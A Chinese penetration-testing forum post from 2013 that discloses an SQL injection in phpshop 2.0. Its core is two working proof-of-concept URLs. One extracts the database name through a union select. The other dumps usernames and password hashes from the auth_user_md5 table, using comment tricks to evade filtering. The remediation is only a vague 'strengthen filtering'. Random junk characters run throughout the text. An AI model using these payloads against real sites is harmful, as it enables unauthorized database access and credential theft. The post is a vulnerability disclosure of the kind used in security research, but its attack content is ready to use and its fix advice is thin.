中国网络渗透测试联盟

标题: phpshop 2.0 SQL注入及修复 [打印本页]
作者: admin    时间: 2013-1-18 18:24
标题: phpshop 2.0 SQL注入及修复
标题 : phpshop 2.0 SQL Injection Vulnerability
+ v) M8 h5 ]% q& u& Z9 O/ H
  H, O  ?9 h7 Q& j1 ~- u% K1 a3 ^' L% k作者 : By onestree
, c3 S1 \! s3 G& ]下载地址 : http://code.google.com/p/phpshop/downloads/list+ D/ R6 `  F" K" g  k( |$ ^! x8 N
测试地址: windows 7 / ubuntu6 y. W" z0 T# D/ `3 C. K

) _, k; Y  o5 e! \/ I/ `# M( d- {
1 {/ J2 w/ |  y9 ~7 ASQLi p0c:$ i" F! W3 r! F7 _4 s

1 |9 s& U3 B5 Y7 J" z- F==================- K, {1 d; {5 }3 Z4 U& g

9 m7 N" C) `, t6 [0 Lhttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
: N, J; k! C  ]union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
: ?% M& e7 w6 x% ]* E
+ q. q2 s& P3 }" Ihttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
& i9 h) r# K! ~2 W* K& h6 z' {+ Y, u6 ~9 a3 D* L3 ^0 P- _
修复:# H  K7 X: S0 T
加强过滤
$ F  z3 `3 m: T0 G* N) ]5 ?3 h4 t: u4 M" N3 {2 s6 O2 F

5 h% m$ o9 F# Z; k( z/ K



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2